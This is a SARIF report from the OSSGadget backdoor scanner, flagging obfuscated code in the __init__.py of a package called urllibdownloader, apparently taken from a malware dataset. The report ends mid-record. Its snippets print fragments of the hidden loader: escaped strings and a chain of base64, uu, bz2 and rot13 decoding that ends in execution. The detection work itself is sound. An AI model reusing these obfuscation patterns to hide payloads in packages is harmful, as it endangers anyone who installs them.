{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.1.428+ed0e2cfe6a"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 22,
                  "startColumn": 147763,
                  "endLine": 22,
                  "endColumn": 147783,
                  "snippet": {
                    "text": "137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(______.b64decode(_________(_______________)), \"\\x75\\165\"),\"\\142\\172\\62\"),____________________)[_____(\"\\x46\\x61\\154\\x73\\145\")])",
                    "rendered": {
                      "text": "137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(______.b64decode(_________(_______________)), \"\\x75\\165\"),\"\\142\\172\\62\"),____________________)[_____(\"\\x46\\x61\\154\\x73\\145\")])",
                      "markdown": "`137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(______.b64decode(_________(_______________)), \"\\x75\\165\"),\"\\142\\172\\62\"),____________________)[_____(\"\\x46\\x61\\154\\x73\\145\")])`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 22,
                  "startColumn": 147699,
                  "endLine": 22,
                  "endColumn": 147727,
                  "snippet": {
                    "text": "_(\"\\x73\\164\\162\\56\\x6a\\157\\151\\x6e('', \\133\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(______.b64decode(_________(_______________)), \"\\x75\\165\"),\"\\142\\172\\62\"),____________________)[_____(\"\\x46\\x61\\154\\x73\\145\")])",
                    "rendered": {
                      "text": "_(\"\\x73\\164\\162\\56\\x6a\\157\\151\\x6e('', \\133\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(______.b64decode(_________(_______________)), \"\\x75\\165\"),\"\\142\\172\\62\"),____________________)[_____(\"\\x46\\x61\\154\\x73\\145\")])",
                      "markdown": "`_(\"\\x73\\164\\162\\56\\x6a\\157\\151\\x6e('', \\133\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(______.b64decode(_________(_______________)), \"\\x75\\165\"),\"\\142\\172\\62\"),____________________)[_____(\"\\x46\\x61\\154\\x73\\145\")])`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 22,
                  "startColumn": 147577,
                  "endLine": 22,
                  "endColumn": 147601,
                  "snippet": {
                    "text": "\\x57\\\\41\\\\x2e\\\\65\\\\x46\\\\111\\\\55\\\\12\\\\x20\\\\x0a\\\\145\\\\156\\\\x64\\\\x0a\\\\165')\",\"\",_____.__name__));_______________=_____(_______(\"\\x73\\164\\162\\56\\x6a\\157\\151\\x6e('', \\133\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(_",
                    "rendered": {
                      "text": "\\x57\\\\41\\\\x2e\\\\65\\\\x46\\\\111\\\\55\\\\12\\\\x20\\\\x0a\\\\145\\\\156\\\\x64\\\\x0a\\\\165')\",\"\",_____.__name__));_______________=_____(_______(\"\\x73\\164\\162\\56\\x6a\\157\\151\\x6e('', \\133\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(_",
                      "markdown": "`\\x57\\\\41\\\\x2e\\\\65\\\\x46\\\\111\\\\55\\\\12\\\\x20\\\\x0a\\\\145\\\\156\\\\x64\\\\x0a\\\\165')\",\"\",_____.__name__));_______________=_____(_______(\"\\x73\\164\\162\\56\\x6a\\157\\151\\x6e('', \\133\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\137\\50\\170\\x29\\x20\\x66\\157\\162\\x20\\170\\x20\\151\\x6e\\x20\\133\\x5f\\137\\x5f\\137\\x5f\\137\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\54\\x5f\\x5f\\137\\137\\x5f\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\137\\54\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x2c\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\135\\135)\",\"\", _____.__name__));________(___________________(____.decode(____.decode(_`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 22,
                  "startColumn": 118325,
                  "endLine": 22,
                  "endColumn": 118345,
                  "snippet": {
                    "text": "\\\\65\\\\x61\\\\66\\\\x32\\\\x35\\\\x36\\\\x36\\\\x39\\\\x35\\\\61\\\\x37\\\\61\\\\x35\\\\x37\\\\x34\\\\x35\\\\64\\\\x35\\\\66\\\\70\\\\65\\\\63\\\\66\\\\x39\\\\65\\\\141\\\\64\\\\64\\\\x35\\\\x32\\\\64\\\\63\\\\65\\\\71\\\\63\\\\x32\\\\x35\\\\x38\\\\63\\\\60\\\\x37\\\\63\\\\66\\\\67\\\\x35\\\\65\\\\x34\\\\x35\\\\63\\\\71\\\\64\\\\x38\\\\65\\\\61\\\\150')\",\"\",_____.__name__));______________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\56\\144\\x65\\x63\\157\\x64\\145(b'\\\\x62\\\\x65\\\\147\\\\x69\\\\x6e\\\\40\\\\66\\\\66\\\\66\\\\x20\\\\x3c\\\\144\\\\x61\\\\164\\\\x61\\\\x3e\\\\12\\\\x4d\\\\66\\\\66\\\\125\\\\x36\\\\73\\\\x46\\\\x25\\\\67\\\\55\\\\x26\\\\75\\\\x2e\\\\72\\\\105\\\\104\\\\122\\\\62\\\\64\\\\61\\\\130\\\\x3a\\\\x55\\\\x45\\\\x38\\\\64\\\\x46\\\\101\\\\60\\\\x39\\\\127\\\\x21\\\\x2e\\\\63\\\\x34\\\\65",
                    "rendered": {
                      "text": "\\\\65\\\\x61\\\\66\\\\x32\\\\x35\\\\x36\\\\x36\\\\x39\\\\x35\\\\61\\\\x37\\\\61\\\\x35\\\\x37\\\\x34\\\\x35\\\\64\\\\x35\\\\66\\\\70\\\\65\\\\63\\\\66\\\\x39\\\\65\\\\141\\\\64\\\\64\\\\x35\\\\x32\\\\64\\\\63\\\\65\\\\71\\\\63\\\\x32\\\\x35\\\\x38\\\\63\\\\60\\\\x37\\\\63\\\\66\\\\67\\\\x35\\\\65\\\\x34\\\\x35\\\\63\\\\71\\\\64\\\\x38\\\\65\\\\61\\\\150')\",\"\",_____.__name__));______________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\56\\144\\x65\\x63\\157\\x64\\145(b'\\\\x62\\\\x65\\\\147\\\\x69\\\\x6e\\\\40\\\\66\\\\66\\\\66\\\\x20\\\\x3c\\\\144\\\\x61\\\\164\\\\x61\\\\x3e\\\\12\\\\x4d\\\\66\\\\66\\\\125\\\\x36\\\\73\\\\x46\\\\x25\\\\67\\\\55\\\\x26\\\\75\\\\x2e\\\\72\\\\105\\\\104\\\\122\\\\62\\\\64\\\\61\\\\130\\\\x3a\\\\x55\\\\x45\\\\x38\\\\64\\\\x46\\\\101\\\\60\\\\x39\\\\127\\\\x21\\\\x2e\\\\63\\\\x34\\\\65",
                      "markdown": "`\\\\65\\\\x61\\\\66\\\\x32\\\\x35\\\\x36\\\\x36\\\\x39\\\\x35\\\\61\\\\x37\\\\61\\\\x35\\\\x37\\\\x34\\\\x35\\\\64\\\\x35\\\\66\\\\70\\\\65\\\\63\\\\66\\\\x39\\\\65\\\\141\\\\64\\\\64\\\\x35\\\\x32\\\\64\\\\63\\\\65\\\\71\\\\63\\\\x32\\\\x35\\\\x38\\\\63\\\\60\\\\x37\\\\63\\\\66\\\\67\\\\x35\\\\65\\\\x34\\\\x35\\\\63\\\\71\\\\64\\\\x38\\\\65\\\\61\\\\150')\",\"\",_____.__name__));______________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\56\\144\\x65\\x63\\157\\x64\\145(b'\\\\x62\\\\x65\\\\147\\\\x69\\\\x6e\\\\40\\\\66\\\\66\\\\66\\\\x20\\\\x3c\\\\144\\\\x61\\\\164\\\\x61\\\\x3e\\\\12\\\\x4d\\\\66\\\\66\\\\125\\\\x36\\\\73\\\\x46\\\\x25\\\\67\\\\55\\\\x26\\\\75\\\\x2e\\\\72\\\\105\\\\104\\\\122\\\\62\\\\64\\\\61\\\\130\\\\x3a\\\\x55\\\\x45\\\\x38\\\\64\\\\x46\\\\101\\\\60\\\\x39\\\\127\\\\x21\\\\x2e\\\\63\\\\x34\\\\65`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 20,
                  "startColumn": 65,
                  "endLine": 20,
                  "endColumn": 85,
                  "snippet": {
                    "text": "37\\x5f\\137\\133\\72\\x2d\\124\\162\\165\\145\\135\\x29\",\"\",_____.__name__));_____________=_____(_______(\"\\137\\x5f\\137\\x5f\\x2e\\x64\\x65\\x63\\157\\x64\\145\\x28\\137\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\137, '\\150\\145\\x78')\",\"\",_____.__name__))\n        _____________=_____(_______(\"\\x5f\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\157\\x64\\x65\\x28\\137\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\51\",\"\",_____.__name__))\n    return _____________\n_________________=_____(_______(\"\\137\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\56\\144\\145\\x63\\157\\144\\x65(b'\\\\107\\\\x26\\\\x4d\\\\66\\\\144\\\\x48\\\\x38\\\\103\\\\x5f\\\\x7d\\\\x48\\\\70\\\\x6e",
                    "rendered": {
                      "text": "37\\x5f\\137\\133\\72\\x2d\\124\\162\\165\\145\\135\\x29\",\"\",_____.__name__));_____________=_____(_______(\"\\137\\x5f\\137\\x5f\\x2e\\x64\\x65\\x63\\157\\x64\\145\\x28\\137\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\137, '\\150\\145\\x78')\",\"\",_____.__name__))\n        _____________=_____(_______(\"\\x5f\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\157\\x64\\x65\\x28\\137\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\51\",\"\",_____.__name__))\n    return _____________\n_________________=_____(_______(\"\\137\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\56\\144\\145\\x63\\157\\144\\x65(b'\\\\107\\\\x26\\\\x4d\\\\66\\\\144\\\\x48\\\\x38\\\\103\\\\x5f\\\\x7d\\\\x48\\\\70\\\\x6e",
                      "markdown": "`37\\x5f\\137\\133\\72\\x2d\\124\\162\\165\\145\\135\\x29\",\"\",_____.__name__));_____________=_____(_______(\"\\137\\x5f\\137\\x5f\\x2e\\x64\\x65\\x63\\157\\x64\\145\\x28\\137\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\137, '\\150\\145\\x78')\",\"\",_____.__name__))\n        _____________=_____(_______(\"\\x5f\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\157\\x64\\x65\\x28\\137\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\51\",\"\",_____.__name__))\n    return _____________\n_________________=_____(_______(\"\\137\\137\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\x5f\\56\\144\\145\\x63\\157\\144\\x65(b'\\\\107\\\\x26\\\\x4d\\\\66\\\\144\\\\x48\\\\x38\\\\103\\\\x5f\\\\x7d\\\\x48\\\\70\\\\x6e`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 19,
                  "startColumn": 258,
                  "endLine": 19,
                  "endColumn": 278,
                  "snippet": {
                    "text": "\\135,'\\x68\\x65\\170')\",\"\",_____.__name__))\n        else:_____________=_____(_______(\"\\x5f\\x5f\\137\\137\\x5f\\x5f\\x2e\\142\\70\\65\\144\\x65\\x63\\157\\x64\\145\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\x5f\\137\\133\\72\\x2d\\124\\162\\165\\145\\135\\x29\",\"\",_____.__name__));_____________=_____(_______(\"\\137\\x5f\\137\\x5f\\x2e\\x64\\x65\\x63\\157\\x64\\145\\x28\\137\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\137, '\\150\\145\\x78')\",\"\",_____.__name__))\n        _____________=_____(_______(\"\\x5f\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\157\\x64\\x65\\x28\\137\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\51\",\"\",_____.__name__))\n   ",
                    "rendered": {
                      "text": "\\135,'\\x68\\x65\\170')\",\"\",_____.__name__))\n        else:_____________=_____(_______(\"\\x5f\\x5f\\137\\137\\x5f\\x5f\\x2e\\142\\70\\65\\144\\x65\\x63\\157\\x64\\145\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\x5f\\137\\133\\72\\x2d\\124\\162\\165\\145\\135\\x29\",\"\",_____.__name__));_____________=_____(_______(\"\\137\\x5f\\137\\x5f\\x2e\\x64\\x65\\x63\\157\\x64\\145\\x28\\137\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\137, '\\150\\145\\x78')\",\"\",_____.__name__))\n        _____________=_____(_______(\"\\x5f\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\157\\x64\\x65\\x28\\137\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\51\",\"\",_____.__name__))\n   ",
                      "markdown": "`\\135,'\\x68\\x65\\170')\",\"\",_____.__name__))\n        else:_____________=_____(_______(\"\\x5f\\x5f\\137\\137\\x5f\\x5f\\x2e\\142\\70\\65\\144\\x65\\x63\\157\\x64\\145\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\x5f\\137\\133\\72\\x2d\\124\\162\\165\\145\\135\\x29\",\"\",_____.__name__));_____________=_____(_______(\"\\137\\x5f\\137\\x5f\\x2e\\x64\\x65\\x63\\157\\x64\\145\\x28\\137\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\137\\137, '\\150\\145\\x78')\",\"\",_____.__name__))\n        _____________=_____(_______(\"\\x5f\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x2e\\144\\x65\\143\\157\\x64\\x65\\x28\\137\\x5f\\x5f\\137\\x5f\\137\\137\\x5f\\x5f\\x5f\\x5f\\137\\x5f\\51\",\"\",_____.__name__))\n   `"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 18,
                  "startColumn": 187,
                  "endLine": 18,
                  "endColumn": 211,
                  "snippet": {
                    "text": "137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5b\\x3a\\x2d\\x54\\162\\165\\145\\x5d,'\\x75\\x75')\",\"\",_____.__name__))\n        elif (_____________[-True] ==_____(_______(\"b'\\144\\x35\\x73\\146\\x73\\61\\144\\146\\x66\\150\\163\\x64\\x38'[-True*4]\",\"\", _____.__name__))):_____________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\56\\x64\\x65\\x63\\x6f\\x64\\x65\\50\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\x5f\\137\\137\\137\\x5b\\72\\55\\x54\\162\\165\\x65\\135,'\\x68\\x65\\170')\",\"\",_____.__name__))\n        else:_____________=_____(_______(\"\\x5f\\x5f\\137\\137\\x5f\\x5f\\x2e\\142\\70\\65\\144\\x65\\x63\\157\\x64\\145\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\x5f\\137\\133\\72\\x2d\\124\\1",
                    "rendered": {
                      "text": "137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5b\\x3a\\x2d\\x54\\162\\165\\145\\x5d,'\\x75\\x75')\",\"\",_____.__name__))\n        elif (_____________[-True] ==_____(_______(\"b'\\144\\x35\\x73\\146\\x73\\61\\144\\146\\x66\\150\\163\\x64\\x38'[-True*4]\",\"\", _____.__name__))):_____________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\56\\x64\\x65\\x63\\x6f\\x64\\x65\\50\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\x5f\\137\\137\\137\\x5b\\72\\55\\x54\\162\\165\\x65\\135,'\\x68\\x65\\170')\",\"\",_____.__name__))\n        else:_____________=_____(_______(\"\\x5f\\x5f\\137\\137\\x5f\\x5f\\x2e\\142\\70\\65\\144\\x65\\x63\\157\\x64\\145\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\x5f\\137\\133\\72\\x2d\\124\\1",
                      "markdown": "`137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5b\\x3a\\x2d\\x54\\162\\165\\145\\x5d,'\\x75\\x75')\",\"\",_____.__name__))\n        elif (_____________[-True] ==_____(_______(\"b'\\144\\x35\\x73\\146\\x73\\61\\144\\146\\x66\\150\\163\\x64\\x38'[-True*4]\",\"\", _____.__name__))):_____________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\56\\x64\\x65\\x63\\x6f\\x64\\x65\\50\\x5f\\137\\137\\137\\x5f\\137\\137\\x5f\\137\\x5f\\137\\137\\137\\x5b\\72\\55\\x54\\162\\165\\x65\\135,'\\x68\\x65\\170')\",\"\",_____.__name__))\n        else:_____________=_____(_______(\"\\x5f\\x5f\\137\\137\\x5f\\x5f\\x2e\\142\\70\\65\\144\\x65\\x63\\157\\x64\\145\\x28\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\137\\x5f\\x5f\\137\\x5f\\137\\133\\72\\x2d\\124\\1`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000801"
          },
          "message": {
            "text": "Backdoor: Executing Obfuscated Code",
            "id": "BD000801"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset1/urllibdownloader-0.0.0.tar.gz/urllibdownloader-0.0.0.tar/urllibdownloader-0.0.0/urllibdownloader/__init__.py"
                },
                "region": {
                  "startLine": 17,
                  "startColumn": 112,
                  "endLine": 17,
                  "endColumn": 132,
                  "snippet": {
                    "text": "35,'\\x72\\157\\164\\x31\\63')\",\"\",_____.__name__))\n    else:\n        if(_____________[-True]==_____(_______(\"b'\\x66\\65\\x73\\x66\\163\\144\\x66\\141\\165\\146\\70\\x35'[-True*4]\",\"\", _____.__name__))):\n            _____________=_____(_______(\"\\x5f\\137\\x5f\\137\\x2e\\144\\145\\x63\\157\\144\\x65\\50\\x5f\\137\\x5f\\137\\x5f\\137\\x5f\\x5f\\x5f\\x5f\\x5f\\137\\137\\x5b\\x3a\\x2d\\x54\\162\\165\\145\\x5d,'\\x75\\x75')\",\"\",_____.__name__))\n        elif (_____________[-True] ==_____(_______(\"b'\\144\\x35\\x73\\146\\x73\\61\\144\\146\\x66\\150\\163\\x64\\x38'[-True*4]\",\"\", _____.__name__))):_____________=_____(_______(\"\\x5f\\x5f\\x5f\\x5f\\56\\x64\\x65\\x63\\x6f\\x64\\x65\\50\\x5f\\137\\137",
                    "rendered": {
